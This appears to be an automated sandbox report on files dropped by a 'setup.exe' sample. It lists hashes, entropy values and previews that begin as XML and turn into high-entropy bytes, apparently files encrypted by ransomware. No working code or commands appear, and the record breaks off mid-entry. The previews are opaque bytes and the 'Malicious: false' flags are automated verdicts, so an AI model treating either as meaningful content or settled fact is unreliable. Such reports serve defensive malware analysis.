              Preview:<?xml.*...0.^...8......A....L.Cg.V2.g.8..j.g.=-.v.2.....`.$Z:.....g..l......?6..5.(%S......qLF.....R..7NW.=..^.....y.@.......ny..k7J.....s.)|..^6....S}'..z.6.W/...Fu.3.p%F.<B]"[Kk..g6.}Brc^@.=d..P.W.NZ4g..O..-y.... ...m....E.D..c..VzvB..LwS.R]m".)Re..b2z.|.A...c......'.fW.O.#Q.f...z...X.C}2...'...u..>.Y(...'k.`.K......g...3.L#...k..i....9}N..W.....U.Mq^....!5.....;:E.L..........%.^.3......].o.........jQ...Z.].......|~u..M-:...w3.)..X..e..TI.;.......s...Z........f.@K.........[..l...Iv.j....z-....H.....Q..XU.3H..).w...7U._Y..gS...$...t..xF1.....hOS"y....i.S.F.KoF......L....G..V.J)....}...9..wuIP..Nn..A.v.[...lw.....V...e..1.^....z...........sb.+.QF.~..LP.7.w..Ou....5.../.Ka0..#>.F.z*...fR..1>...a.s...<..G.I...?...b..I.s.=....X....QD.O......o..U.a40...y({|...i.l.K..E%..i.....a..h..`+R......#.."..OoM.v..n~]y.........RHm..._.2..._.....T...M;..X3...%.M..t,........zZ[-t.iQ.[V!G.....:...U.H..n..?&...b...1ES... ...nS.._c....%|....C..o...2..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):838
              Entropy (8bit):7.693416414545675
              Encrypted:false
              SSDEEP:12:QoibdwVHjd8i0ztiKoDqHe8LyBbmEEeRsRjxn98JILa91gsCeKqH/5y5xw96KJsV:QXbdajmvoglytmEqOLZCPqRam96RbD
              MD5:D9A1929424176476ED57F4CD997EAA4A
              SHA1:37D690044EB6F77639FCD7370101971E3B0E1BCD
              SHA-256:1CF334ECA0DBA34F4A5C271FBFF8EBC28FD97A88EEB452DC7E5920FDE975DE04
              SHA-512:E7A4B796CAB0220BB4283A35287E7FD57B1DF7A8C814EE0B55C85D0355112F8419C9EDC858B6B09615CC47299DE6F9199518DE779AA87171899716F81575855A
              Malicious:false
              Preview:<?xml-.ih.|._..T......u.l....|.&...b.*.ogC.A.[$..D....A....$....*..z.:-..V....g..]2VG....n....ar..=i3..z4......5..iX..=^..iiJ.iL*tC.40/Zn..\..._....9.1..%e.O..{QzM...5...^...;..".T8ae....(..1A.rv~!.......O.....HU....e3!..k.\ .BM(0i...iR.T8+....... .C......W..v.?.....3.l.X.-.....1.7..c..=.&..P}2.......`.8p....Z;.7O.Nt....-....g<9+..p_......h.As.........qpM......8.....tR.R#q.......X.>z......._....u.nC.u!^.z....0N.).r...`....49e.kr`8va......?..V..<...X....4.3..Z0........B..E..(n._.'.._..g......w..w..'..1...b2.Rlo0B....(.s.r...@pkB^...#..@...lJ.d@..l@.D.j...C....i.^..h(5.1.>?.,.*o-......),".g.\.YL.K..Q.n.%gE9..G..D...e......=.*n......A`.hC.....3....s.o.AL..~^...P.k.H.|...<.?...m..R.KOk9...a...0..%..:..Pqz:..z.c.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1010
              Entropy (8bit):7.811639534041783
              Encrypted:false
              SSDEEP:24:XR63FFIGyKzxJRBmhlRkXcuuvTDV6uox6dA8bD:XAfIGyIJ30ScDvfPD
              MD5:BC560F6B9EB5542B8D9367059ED62BB2
              SHA1:418EA78E1069248F3527E09116DF7DFD0D622BBA
              SHA-256:C675BE81276B74B2CB8D1E3A27BECA6BF5289553E0B1BA365E34666D1917CCCC
              SHA-512:8503BC05E376EE577E70BC06C516F1334D6EB013188E29E78A1E071A9107D6DC4C3BA6E5C0E8FF2B062E83D29363EDD5354AF387B91AB267602AF70ACF7258BE
              Malicious:false
              Preview:<?xml......x....x.8.b...=.V..w....!..J`.9..DB...f..^...=~-W...Q.n.....8.7a...Sf...k*qRd.&...]..^.w..9n....p..1c&.....K;....!..T......jC.X....WGN...*.......f*...e.v.c"..s.HyWA0.;..N:..~F1.X......#.$@m....C.T.-_.....CNZ.K...}(.su5...C..F..k...:....]/...y(..k.i.u.(......'.aJ...6=3".../...J..!.`Sgo....!...J....J=..)7Vm..8.y.(.).=~.8.4...1P.......2..N...x.o...[.Cyak.*..g..a....lj..*...w.y......0..X.....u=@.~ .H.v.=.x....9o}...._..cy)..?:L........OI#J.$..s[)_.u..G.I.R.QV...:.i.f.\..g.......pI.\@.|W.v..T&#[.....GGQ.~u.]r.\.m....y..b.y|@.n.3..".....e.b...}......N...j....2|...7.....6...7...........y}.7.....N..0h.i|{.mb...G<@( ...\...._......0Zl.1..7..@L.#...Y..$%.&.;tU.... ./...uwx(.%..."AOh.U.e>..>...Y~..w....bCri....xu.G.V....8..V..{.+.....k..bJ......p.n.x........b..#............R?.F.M;n.u^.oY.-&.).CHuL..3.....I...a9..... .....>.>..:....u...jM.=.....SKD],ry.....hd..]1>#>..%.)..NTVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1380
              Entropy (8bit):7.852115859174557
              Encrypted:false
              SSDEEP:24:DlRZgKAtDkwsPlRtTwDrbPITMbwl2HsNHtAfx0QbiIjYzDayHchmjWnXDYbD:DlRZgtLWlbEDZJMNHtAfxbh4DbchzDCD
              MD5:211C6BDD62541A16C2C82CB609775F1A
              SHA1:2FD0B1F6C262D18195ECEEA2EBBE1F55DE066E04
              SHA-256:54C3C5A2FBF35E14E89A5C9F9A5E5685BF0CF9B63135775BA379CE36EAD9717A
              SHA-512:6855BF3A8B0BB83263BAF20E451C77D5CC00838B89397EA4BDA212B2F2FDB54E2D66CDC230B65F7E3E8D8DCC704292FE0F7FDEE9C93E7EDEC1AD2C0BC98AF988
              Malicious:false
              Preview:<?xml9.........dH0$>..c(a..h.?.iz.O..-.\...go.H.{..H..Z..]1...h..i...}.!....D..a.......<.i..&U]w.;.|.....]|e..65..... .Xg2... .n..j.[.. ..l../.l....i\.5...,A.~..a).......>.~.....T.....(..........*.-._F.~vW0..~>......9.Nm.D.@...\;.K]..'.v..{.5}.`?......!.. .I...cj.tJ&.q_.R}..K..B.$..T....[..w.Q..._.....(..R.[?....ng..I..e.3....m..9....Rq}.....8.....aRy...R.?q<..L.K.R.,O....5A.....%.Y...hZ.../.@.z....t#.N?.hj...Y0ya........H.0T.X.....>:J^..fD.4......k...../.."kAHX..u....P..*R.............x"..{..y..[e..M./........IJA..-/}.....).....-X.,>:).q.."..btD.#_y.m......@.f..7..e0.g.......~o-.ub..6...c......|1q..~..V_..`.S.u3~..}u....B...|.b...2..fz4B.8..a...p....q,Tr@ZC..VU.%.K.N*b\.G5o...........Ew'.?;.Y..1.3.\/.P'...Z.S...0..=..x.H./.....=..9J.Y-.2H...9...>(.JLV`.D8Z|G(...A..s.b..{.d.9+....A......H...8...-....l...\;.\..m>rf..&....,.....x.....J.G..r.PH.}`Zt..Z..../.m.s..W-TM..YJ.....Z..Z.RuP...N3........-..x...*...=.+V..?U..dp..R.q.j f)..[....S..j.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1614
              Entropy (8bit):7.891750725095423
              Encrypted:false
              SSDEEP:48:nlvr71dWI/9rfmnnf+PpSakGKMcO05D8U7UNCnD:lvf1dWI/9jQf+PcakGKzO0F
              MD5:28D9C29317E28FF99CE37BB11E439494
              SHA1:6DD764C57F76232506EAA1B991CEC61804BCA52C
              SHA-256:31D4B641E8E182B6E46A2EED6C47F9F862AFED5303907ECA7F83F2BBD6464ABA
              SHA-512:4C4292B57F6887FD108FC998576092B62E58274C19F4DCC62FDBDC770F679EC47D65F2169B9AF73AA791DAE181529D9873EA9FE991DE356916EFB4FF065DC19D
              Malicious:false
              Preview:<?xml.?%D~Y{...7E...2.&e.,l..XY..y..RKr....S..1. ...}C...P.%.H...%.3..9...EH..^.r.........'..s..m|..?z=.I..5v...!....$'.J.Go.O.....S@s5#P..>v....I...WAN.=..2......W.....V....8.C...b..S.~.4....B3Dt....^.......$f.F.../5......}[......3z.J.&."...J..V..m.....+.-8g.~.u1"......e...........-.n....u...6.......t........"9.].&U,...q...>.h..L...)n.df.2...)...........e.?...=.c..;....m..C...n.{...,f.!.u.):h..R+s..e.k~......a..Ro..#l.'a.!.........&...........G..8.d..,...c...d.d...k.X?.....#....d.......4..C.....G..0..'...pA....$....+.>}.~.......).m...Ls...R..c.....(...g.GB..#^..@q..o.:.,.[...>.f.........<.......2..X..od..3}e..W........../$......;..Y....l&'h.Z...w...}.jr`@CY(.VA.P.H>u....;.......4m.....F.g.8.P.0./..?o.....FA.... ........;.c.7J......[.gC..7..'..5..8].G....M.u.`qh.<i.........aW.M..Qd...N..^.t.....^.!..y4.....]<D8.=A.9.p.^.@.Z.4..4....T.k....Hn...o......l...|.}X.GBX..zsI...).2g>....V..(\..Tb...7.S.n..~..}..$..[S!T.-..L.+{3.7.9...w.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):2753
              Entropy (8bit):7.918752992241663
              Encrypted:false
              SSDEEP:48:8SrojsFZe9fVcBMP30Hxiq6R/Ol0q2ybrLHUOPeR45qUCD:8SrasCNVh+xitA01qr0Aqp
              MD5:E879A40E16BF92CA2C302D9119765CDD
              SHA1:2A48922AFB026ADD1A729DCB71BCA051249616AF
              SHA-256:5E04C86B9E9311422E188D701D595A0A0E1360FBC6BF0D9421879E31084F68BC
              SHA-512:F2BAEFAD3449A4530263BBE8207DEBB777FF407F1D83B27C36A2F2B41197299C38B22033D25FCBE0AB13CF1F6039294B489F883E273B10A3B9BD45C9BC21037F
              Malicious:false
              Preview:<?xml.\.....x.aW....N...[..K..=..#.;....A.A.`u.....`.[. XU6&rH.C(s..n...sT(....X<w......&...o.G.c5IH.(!.....J..3/.......eM.{}.5<"...4.....^VRi. .([.|.k...F....W.+N.f5oX2.~`4.)...)...h.w..7..5..0..".W-.P..?}..v6..+..B..V.s..0..K[...Yw.....ow\.k..9.RW..|...j~$.}U.."....;.....-h}....;.......#..Dc.O.: ..HI.......-V-..Q.E.)...t.....ACS..7.M.....A).{.b.v.f...L.r..?..6C$FO.*..#.tE.N.N.....m...IW.....M}....M;S...^R4..3...._kw.z.J....N.*.Un@-.@o..RZ.......z........&.a..,dq.z@.EI.]j...k....(...U.kOu...L..F...7....y.!:#L.)~.^K[/..@.fJ...`.GK......8RRa..V7=..5S....MD..GI.J.$4..8.,..y%.....f.^.3q.,EF...hO...FX..^P1-.....OzW..z.A..3.^...j.|...XS..Vf.=...E.v}...7^..r:.Kc..U....|...2A...m.!....>.E...pj..uE...3V[.|I.....'u..C.s.\..h..s......e.I.^........@......_.......a$...X....Y].8f...b.....#.D...9.=.+Q.F.D..XG.O.U.?...I.S...;..x...rlP...k.}+8eQ._.;........+.X.K..O.4uuv..M.W.A.Bt..........$...r.o.ta..;j.Z!E.l.!..P..W|...k`J14....vb..q.8.N.....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1558
              Entropy (8bit):7.856612080213836
              Encrypted:false
              SSDEEP:48:ZgqHahlJTmeYe1ks84Xi137g4GtdhF4s7DnGx0bVD:SpltmjPF4Xip7g46hZDE0Z
              MD5:46BF46C6BBEA1601DCD9C662F98CEB31
              SHA1:78FD73A7F84143F1DAF07332C168381E0CEC0112
              SHA-256:98887677BAD7C72D6358C1EDB9E2AFE508313C92FE97960340FFB83A4E3354A2
              SHA-512:CBCEF0E87B49D29D488D3514CD5B113B8EFA4BE55B415CE4D2E05EAEF16F262B3C4E965D1BEE4C6925129B66046EEA14D493FC5A39354FCC5C240848B9EB9F78
              Malicious:false
              Preview:<?xml.4{..b....S.r..b.\2....Z/D..m..z.)i....].T=..*.D...]...rR.I......kL...._Kxy......8.JA.m2..2Q.n..fV.z.!...=....""....`..C.........}.` ..N..E\[.B}....;..v.yj.Y.3..KkgK...4...Q.h.....o.YaVG..........`...|..&.8MB...i.a.....t...Mn.@..:..M...y.!_.{... ... ..H.p...Ke.:.../..Sk.(eq.$..te..r.....l.a...*...~&HF.....$x.0,..<.|..1.}v..#....h-sop.........gky..|Ik^.5..e..'........r...9L..5.x.-hC...l..e1....JU........a..6..(.3+..U.Y.X=...!....J9v5............J5..`..Ys.@K.\G....j.@...........T..B.8......nD..u[...+r[.7?C.i..:.9..~G..E..FF........[.8.*.r9|..N`....s.p.... h7d.....cUl..H..li...r.|..X......x..|.A..q...r....7.w.O.kJ.,y.._dAE.v4...GO ............GY.m...c&.l.=<...DH3...2.<..5.8..M.........ft..$.r=..80./...K...|?9.c.p|"/...#w.J..3P..%:..A.n).[.iX...*-.R_...u.XoQ..`..Inx2.G.k....[%..........$Be. 8v.a..U..=P.V..:+....?Q0.....MH...Vt....[%K..>U.......MJr...7 ..../.>u#...C1.` ..f.....(UC.C..D..]..L.......h..Lp.7..P.I...n4m.EdeH.....{HP.....S.......
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):2251
              Entropy (8bit):7.913522076525525
              Encrypted:false
              SSDEEP:48:7CfTrqefewc2QntSy2ZAr+r59/MALdRQof/Pg6sD:7CLWe2w5Yr6Lnduofw6I
              MD5:5B291C25E78BD156F81FB5E70AB092B6
              SHA1:5E51CEC2ECEEBA5503C5AEB99F6B56BCA8BFD81A
              SHA-256:AD382CE7829BC2F0AB1920A2D2D79F6EE42AC3C92649934D969A2ECD8301EAC5
              SHA-512:69A63A2B8C8D92A7DBD1F80F4111CF5170C2F231CAAEBE7D1CF1B5AA3B3344E67C9758D2A1FF79965006C60E79FD21FE90FAF3454DCE48CAD284EEDC07030741
              Malicious:false
              Preview:<?xml.t.6...M..7..k...lo......}..#~.X.q..Ue.QP.H+..oM8d...f.....l)|-...2...Rm."r....mr...'..o.pW..XIo.BI0FBa.*..P....Q...v.`..#ZSiV.[kGp..U..W..o@....C.6?...jGt..u.......%.4....(.4.'..Y~<......*.$.Z.."...1:..M-.yTi....m../<[<T...j.'.~.C.z-..../)..Zp..Df,..F...G....w....$.v.D........>]..~eW8..i..-...?...Q0.q6.v..Me.GS-e.$.......P.Yuxd....m..L.u..K.......H.....T\.~.[<.R.T.#..w..:..q...Z...-Y...........h.l.C.W.b.o..Y...i..g.)i6Yz$1;......k=..B.i...(e!.+.!.n.....Uh..R....q.7..u..?.,......$/._.W...kj.=.......\..3.9.]...k.!...9.1.l.<.qe...;.;.e/iX$...D/..0..G....:IW..kK..&...|.|#..B...j-'...!.V.D7.w...%.W.n.z. ..&.in....J..wB...i..H^.X...E...HP..)..|I....Q.....I...N..Es.&(.....s..R.a..s..)Vu......q...+....W$.H...Z...|Lp..MV...6...{.v.%..E..NV.....!/.>'f..Z.n.d........E...f...Qm..9.....2.Q...E..T..,....'!<..eAyP.ui.U...^H.u..~.<...........07...b..7../.. u.s.#i......)`.<.<`x.}..I.3.@......nf.Z..H2...T.....^Bu.o...1....Q........o#G}i..rS
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1826
              Entropy (8bit):7.89088006902339
              Encrypted:false
              SSDEEP:48:ALWp4gjacslEusl+MLPUjs+Fp1F8ibW3D:gWBa3lO1LPUjLF8ibWz
              MD5:93215D3DE2D0E50B63AEA7D761171CF3
              SHA1:8B2D9067D004DB3DE42442CDA484290982D20026
              SHA-256:BACDAB437D943AAC86ED2BA0D2BD6A5040561A7C672692463061AC9366B3DBA4
              SHA-512:5AAEBE54E50C48280BC41C8582255308C773606A656DCD7EFEDDE9E77B91E4A39E0D9867487729BEC1DB6C93F4A22F04922DCA2BCC0CED25BDD287D4FEDA18C2
              Malicious:false
              Preview:<?xml.1..;..0..T.....h.6...{>.6.f.z.v._....P.{.|.^j.i}~!R.;zr.....C?].1r.....L...<Z?.".....R..:.k..]Z..g......u...oy..8r)...3.B.X>..>5.......Dx.)s..b.r!.......9:....S.gJZ.z\.R.#.....,C...\.6..h%..<..~ V9.P,...vf..g.A..$...A.....K...W.u...+...[..a....j.........5.z..%..!.rRD7..]..i$u5%2{..[.}V..,....S2.l'y1.._X.4;,...;.x..n*......m..H...v...0..L..!8.U.#.=..8e...?..X....].N.$.B}.4..D0....6..i...sO...A....E.9. G.c.....s.K....m.F#.>_..K..w....?.^..y.il.l)6.M..J..4...c...L!#..o..D..8.....n'#...1...h=..)........N7.M:..;.=..T..+.......6..g.....d.<.. 13.`W..R.....Yoq..%.Y.o.[s..l.. ..y/....M...cp_(..g...8.....=Z.N......S.._w..Cs,.4.`..S.....?.x.H./f .[1*,.a..J..-.....i..E[OX..Y.(..kJ.D0...tF....,.;Y.....r..8...O.F.W..**Z`..C..6.jI. .$.+~.sT.oMO.i,..Ul.gy.g|H..Ok..'..UU...j.5.Z.0G.=.>%....E......Z.x.;m..jq........t.c..<....EL 8-.|...`..h.ge..?..|*...:.0...2V.a.tN.......+...O#.8l"......x.n.o....-.h.N~..S.e..i.b...j.&.h.;.[...I.T.p|.H.:.......` ....,J.e.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1197
              Entropy (8bit):7.835848748088043
              Encrypted:false
              SSDEEP:24:JoVWfP3+CyKb4KtPnWeYTI04TCY4vqiDXbD:JoAfvXHMTI04TCY4vxD
              MD5:FBB775FFBA8FD1CEDF37F3BDC7473739
              SHA1:CB9A18233D146D310E88CE9C5E2E2F667828F09B
              SHA-256:1CC216CB7403B8CA99E1FAAF7D9839786EDEE8237385042C1103256D059C3049
              SHA-512:5BE3E331D943857EDE057C9C84D4FA0C9C5FB3F6C0F8B13F9902A2800800E5E27A39FFDB3B73547089FE6E7ED764D8CEF6DEDBDE48F77424E6520C4FE2704705
              Malicious:false
              Preview:<?xml6...I.Fb.."|]\u..oF.m.>6.8...&......7.....U.a..Y.x>.Q^...(/}.J.]*v..._.[.).b49t)H....4].....\.t...........$=D.Xt.....0...1X.....[../d....h..".O....W.....e.?S.Oq1H.....-.M0]h.-..Po...'.e.).Y...0_.].~..lbC.?.v)..M.&.:d..O..(i...m.t.....a...4.J#UX.1..a..:...n$.Y.X.G.S=...I2v.P..9xj....4.f..R=.....N...I... G(.;r._`dq>2XZ.-.d.`TG..E.."4.Q....M>K...Z.K...z.l....5...6M._....m+0..T...X.(t....m_S..r!...:.J.djFWVI...N..g..$..{..q.Q;l..\d..C<C...qk.._...m..h..5.....e..q...;.aN3....6.G@..#;5.Z6.2.......x.....G.^.~...T...............w..J..uYA...y"R..+.}.qO.>.!.......sE"...,2.;y.k.[..P.g..r2.S.....|`7.4.Y..=Oq/....w..1.........F.`.6~...O...8...g.l.2G,.1/..l.1...S..jHhw.>@[F~....^M.m../..Gb2FaRa...n...q/....c.(....r.zRS...N.3.. ..x.s.....(...0z....@..y..:pt!..h.S.j.=?..+....K.(Z.X.f?WT.p]...+.#;..........z..ee..f.TpE.G.2d...V.z...}..{mQ;...../...h......4F+3.........70...J.. ..Z..5.....8-....B.*mO`g..R..o.&.....p.?.._....m/7$..7.v..B...{....4(..#..N./9..;R...G..K
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1004
              Entropy (8bit):7.781921775975881
              Encrypted:false
              SSDEEP:24:+wKLJlB6aljxe+RnBpVEV8OUgmIKlOsB3RbD:+trMalFz2VB9Klp3BD
              MD5:7BD88F836F75154E3A32AD046A34211A
              SHA1:4A84FE7FA33F9F4C023926A7AEB502D1E8D124C3
              SHA-256:DD64F532FC957C91C52493DAF86B67963E4B57FA99802BAF6269F04E6EE8F43F
              SHA-512:F396AFDEB4BA0EC8FCBBC4BCF3E08E8A727AE1B52C20B4A296A560A3F5C74DEB5B42E5B6BF8BE05FF5CDF90AA8D722ADBAB3D622C6E5AA26C8575FDDBC43CA1D
              Malicious:false
              Preview:<?xml.b.~.!.&.9aG4._f.....:.hv..U....1.nU........O.:..!?.wP.J.Fy..}....;..:..w..W....u.1..EP^..?..~Z.I......@.3..9...g[..RO.P.b.A..B.w#1........7&.m_..3T..sl._.Hc_....r.l...4...........O..2..qN..|H...9..4E..........Pvo..j{;.~A.z..3.c...........mm.]..j.A.+.6.6...)..0f.....7G..7..n-/.>.+.?..S!..y-..E..Zv=j.md.!..8.....O...f...........=,!VM...u?..M....%...W.u....`RS....eg.R./.....D-%}F.=.p.9...}..t.....z.CV..8...6nd.......9.?.c..@....;a9cG.3....V...O......N5...I.....n..k...lm..=....`f..W./.AgL./.QkE....4.QT.l.>.....X..x.u.@..&..='........r.g.G..o.2......R....~.wyp.9..E......-...*....1.q...wX"....|...E(...!`'\.....hQ../b.......4wG.^<Y./.Y\...].KH<..j#......Z.m...qmZ].._K.\.[.(7..\..>.,. .9..q.(...gF&o.bO..p..4.Y..o..../).....^..Z5x......vS.5.....5.B.ni!D....`.&.._S].....YW..F..5.*..z..0!..@.%`..o~.L..&G+......O...a8...V.........^.#....SB&.2E=..w...5.f{...\'E..k..#.E.R.JVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1186
              Entropy (8bit):7.809150357735898
              Encrypted:false
              SSDEEP:24:Q2K5lOZUbILgPwPZLNIGllIDVkTJqwy3yzoe14rhZPPNFpbD:QV7OZUkL6MvIGl2DVk8w9urHFHD
              MD5:225B548E4B7FF0516158767FEB244A77
              SHA1:5F735A337EB5BCFAF8EAAE0578ED8EB0248DD977
              SHA-256:5DF3378F5D8D5424E88C4039E1F535637AE755407AD97C944F5189A00C25AE9A
              SHA-512:228B23A450A5E70D5325BDDE3FD21F6A33FA79DC2677B2F5B43104FD1B62315084F8DC8252A7E6DA40352368E7E41CC89AC3F87CE4B323055B1657C875DC9EA4
              Malicious:false
              Preview:<?xml\x;u{.P..QQp....f6\...p..U0...'..S(.P...f.Us..F._...Gqp.A..a..}... .jL....k.f...yJ...-.Y*=Z...[.~..Q"..T....D....{.K8.xW.2\.UJzW.$..W@.w.+. J.....K.SPO.....~..%a.....ud..3[.~..S.L...[..9.v..M..[{e ..P..1.j...*Mj.)._+U.gR.J.V{...`..P.&....T..6F.>j.l..U?.l.......H.z...o.....dA)........q.....m.&....>9.#j...v..P[)~....-ZG...8U....v...jP..q.za..>..Dv...`.6&]o!....|...5bo\^rip..@......>........dPk..`)x.^....2..M.......eiK.]m..[x..Z_......y2[>.\.W.2..I..G.7..[+.y....svH..2D..B.a....3..QJ...;.?.E..{1..bgp*.D..bL...,....^..;D.....{...].s.L...}....|...(d..9...NX1.0...^.+..j.M.P.K?.'.s.8..r..6j.3..Ig.....L.f..lP....-&.[.........._.L.......O-u_..d.?R..+>..V-......!.C..-.L..;..i(.l.....Pi...%.`..@.MZ........o.....)..7p.v.....MTx.I.@..!...6pn.Y.Y.....XmV_....&..E-6(..Z. .8......]vSQ..{..v........p.`.y,......P.;e@..3M.j....9@.g...../.+..\...o.c..q..YQL.*.?.w..c.$<H4.;.x*......q,..J1.....&....u..G.^.F.*.l".O^..?.;.....P`B.<..{..S,\..2$.....l<Z.Ux..n;
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1291
              Entropy (8bit):7.81076133138852
              Encrypted:false
              SSDEEP:24:ySaxSdgw+Pf62emL83ronvllrHlnj/edQx19ZSNbD:yPo+Pf6g438nvzFDYg19AtD
              MD5:FE99EF1E6000C60179590568A90D85CF
              SHA1:6513A0452E73265FB04C0707BF3273B0E774645A
              SHA-256:423CE3407B9D8A1AF2C86394A267A6F9AA3A8676342463CE7760443444B432EB
              SHA-512:CCAB6E9EB06D56DA539DBE8B0206FE89834901FD4D4DFE44A4234D347B2E6DE002BED19EB15FDE84B944C7C8C170BE517F0483818C1B80D2DF6AF1FC248779A2
              Malicious:false
              Preview:<?xmla.#..8x9q.......m..X..K..OI......P..*....j...]..y.....I>.&....{.. ..{....cWO..........d..W9L.|...$.........V$.....D......s.3Q.3.....~O#D.|........4.G.M..~.&....C..........!S3.:......i"....#...P........l..p....E|8..|.....o>.Wy-2=....Z.)...z\..5x.G.X..g.!...:....xA.F.F..EM<.:..Xm.............d..V..[B..z........V.T+[.j..t9......\F..;...f!..^.z/.....SB.]..yU..I]>{..jb...i..y..=3.m2.N...v..M*.....s/?\..V.<...Am.B...S..I....0.<.]5R._D...u.2n=ZfY.k.l|....E..t[..j."..........F.._.@.....O.........q.d..L.Z}o.S,../..[d%...G.<p.F..AWmK2....^...tk{..a.D3.8.o.zB.:.L.11%........U...^.<<|.(..$en.%..v^q....Dz|.D+..)r.4.=o+E....+r..E....S.eJf..%e#.E..V].V..-..8k..^2..`....L.9.D.{.......a7`.G|V..'4/.....V..JM,Z....s$.\a{.2.T.(..nH#..e..9#..!7.]>@.Df|...G...]......H.+.-I....gu}...w.u7..+r......Jwo.F...^....-.Ls.@M.J.X;7V>.;....N....i..:.....3....{.......r.y/.r.L.6-...........oa0j.W......2....8.p.u..J|.z.H.L..g..D../'...0M.Ff.......G.R.=u..rK.3....}Q.")
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1737
              Entropy (8bit):7.889866920020743
              Encrypted:false
              SSDEEP:48:+1QIaWkLRwXMT+CN6RGyqvumqoQjzbaAyLyOidD:+TkLRt+G6YzPQXbWOOS
              MD5:4DE4900F68D9A0FFA86439F96550DD0E
              SHA1:B68BFF17D1846C7A12999077D30946D867650331
              SHA-256:5BF1C7C4D68FC967FF405CA0F83765026EDDDF63FFB544D1DEBD8FD34C8F1720
              SHA-512:1AD1AF02E62847B97ED61B047714DB075F6937FD2B191670BC112F8B2588C694D4C7C210695766DDFCC4C31DEBE6B4993DF67485DE5CC2826809B4379CD704C7
              Malicious:false
              Preview:<?xml.L..N .D.Z..d..C<...}.&..<.^U.....".....!.5.t...#..././.8.{.$e'....j..El....<yV...,....n....i..B....*...)i.-.y..0..n.k...k.+.n8:bi_*o?Q7.".z@6.../.b...^....~.2.7.Hp|cV.l..U-/:....-.lor..[.wj...q.......A.N-'....2...(...r.G..*...X.En.......n7.B.l.....wc..1..y.{....m.8#.t..:.~@.I..<.}<6OX,k]*.C..\.>-...za.D.......i.|.9........}..........~.#.}.......h..J.Y5..~>v...C..c...=.....VQ .9.3....]$.O....1.........~.......UK..Tj...]..W1R'...0..bk..wD.{....#.d.a...}z.E...+...q.iS....c.?....F......E..lk^^...<..y..$.vj[UE#.SFP....W&..l|R......$....*_n.(..7..r4l..........,7V+..N.....:....2.NX%$.._..4.\...@.0S.m.^.<.....Xb5.F.y....]W.iY.J.qI.....uP@.......>.I#<"...z&....W..$..K.@..whz..P..HX1......%B*..S....b....Qx.j~..[.\#..-.....@....L.....w../.P.A..d|..?...i.M.7f.y{'........p.._|..&...Xs.}..w.~..y.....K.)0.. M...g..K..\..v.....!.H.4.E.`.#...|Jz...V....o...U<.R.~Tm.MB..5?*..L.4.}7+6.h..s.kru..Hh...4.<O1#..#...k..%..I...2J.....P...,S.I8J/.J...}3....=...b....P.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1354
              Entropy (8bit):7.861274394259234
              Encrypted:false
              SSDEEP:24:T0b4pZeiQYJ9WRMvybuBnTWUmtC4xo32s3HoSKRoqhK/A9e/jt9Csu/Xwycc0bD:q4fe/2pmuButC4OGs3HoZRhMN9CyceD
              MD5:C0FF74E7EB3065B63F0598F8E9D7D6EE
              SHA1:5FF03B3BB610790C9A6C5D35B97E4EA789F495D6
              SHA-256:190229F6292CBC558A57D0A24D18F54B0E604F68AFBBD6AED9A12FB5694982B4
              SHA-512:FDBBF29383D0187BDB8ECF785F2ACC28EBD920E7962A2C0F9A48460CE31D0A6CA4A185F28CFC2293A17A1E5B184B5EC1BD0C564BA1AA83CA0222F216740AEC06
              Malicious:false
              Preview:<?xml..Y7...>5"C..?.O..........r.."...C...l..2...or.Tr.(.........H.Q...#0!w.1 .&Ox.Aw2`...gM.k...]P4$.%..3-r..8....Z'sd.o..k..^.S$...s.z`.i'..L-h..ei.Y...q...&...b..^.U...A....=8.....x..j.~.7.u..%......2#y.Y|.s...~....; ..{.ZLZ.N..k.2)....L\...X.....A.....XM~|...).|.6/...s$.p.n.8.>L....%a$.W~p.I..C.........U...wH.M.9.5....*Sq..].m...?...O.I.-q.He.:6..8..{.>/.c}....G......"Qm..D...tj.....I...x..b....4..p:..@).6.......W...x.$.......d..^..\....Z..Y.l..]..K.|...-.$....<7.......:...u.}q...G..~..c0.FV.*(.TLA.3...a.9..e.V,.|C.bV.....RX....%wZT...T............cZ.m........!..^..A..h0.._p. ........7.]rZ.Hh..f...w6L...q)xq....'.u..+*.. ..l+....Z..I....}-Tc.8..O..)J....v....v..g..|.(B.D.OS..0,2A.I...<..m.%k[.S+.4. *.E.eN.c.......4.2.6..$.d>.9..i....^.<....`.R0@..8W....^..).......;...OV.j.dF(_.......{9.....R......Q6H..9.P.......ob,..`<.z......... h...$..2..J.o.3..@...Yk#^.x,%...-.....`.=.........L.c.!C..;.W...{._...U.._.=n..K...Y~..4.d%G
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1864
              Entropy (8bit):7.893191421676359
              Encrypted:false
              SSDEEP:24:0IkkoNM5g3XLBt8lNH4H6sFCq3o2Hy+ADdFJwMIDErFlcYcfs8w+8AwAv/tLyrG/:07ZNjLB+XH4HJ4vBWWcp8A1IqyMJ8oD
              MD5:61C50E4F12C9476E5CC48FCF046AE13B
